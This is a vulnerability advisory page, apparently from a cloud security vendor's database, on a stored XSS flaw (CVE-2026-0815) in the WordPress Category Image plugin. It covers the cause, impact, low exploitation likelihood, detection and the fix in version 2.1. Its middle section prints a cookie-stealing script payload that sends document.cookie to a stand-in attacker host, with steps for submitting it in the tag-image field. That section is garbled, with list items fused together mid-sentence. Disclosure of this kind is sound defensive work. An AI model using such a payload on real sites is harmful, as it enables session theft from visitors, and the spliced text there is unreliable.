
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-0815 is a Stored Cross-Site Scripting (XSS) vulnerability in the Category Image plugin for WordPress, affecting all versions up to and including 2.0. The flaw arises from insufficient input sanitization and output escaping of the tag-image parameter, allowing authenticated attackers with Editor-level access or above to inject arbitrary web scripts into pages. It was published on February 11, 2026, with a CVSS v3.1 base score of 4.4 (Medium) (Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from the plugin's failure to properly sanitize the tag-image parameter before storing it and escaping it on output. An authenticated attacker with Editor-level privileges or higher can submit a crafted payload via this parameter, which is then persistently stored in the WordPress database and rendered as executable script in the browser of any user who visits the affected page. The attack vector is network-based with high attack complexity and high privilege requirements, and the scope is changed, meaning the injected script can affect users beyond the attacker's own session (Red Hat CVE).
Successful exploitation allows injected malicious scripts to execute in the browsers of all users who access the compromised page, impacting both confidentiality and integrity. Attackers could steal session cookies, redirect users to phishing sites, perform actions on behalf of victims, or deliver further malware payloads. Availability is not directly impacted, but the persistent nature of stored XSS means the attack affects every subsequent visitor until the payload is removed (Red Hat CVE).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2026-0815. The EPSS score is approximately 0.026%, indicating a low probability of exploitation in the near term. Exploitation requires authenticated access at the Editor level or above, which significantly limits the attacker pool. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Red Hat CVE).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.tag-image parameter: Navigate to the plugin's tag image configuration interface and submit the crafted payload in the tag-image field, bypassing insufficient input sanitization./wp-admin/options-general.php or plugin-specific admin pages) containing script tags or encoded JavaScript in the tag-image parameter.<script> tags or JavaScript URIs stored in the WordPress database within fields associated with the Category Image plugin's tag-image settings.wp_options table for injected script content.Users should update the Category Image plugin to version 2.1 or later, which addresses the insufficient sanitization and escaping of the tag-image parameter. As a temporary workaround, restrict Editor-level and above access to trusted users only, and consider disabling the plugin until patching is feasible. WordPress site administrators should also enable a Web Application Firewall (WAF) capable of detecting stored XSS payloads as an additional layer of defense (Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."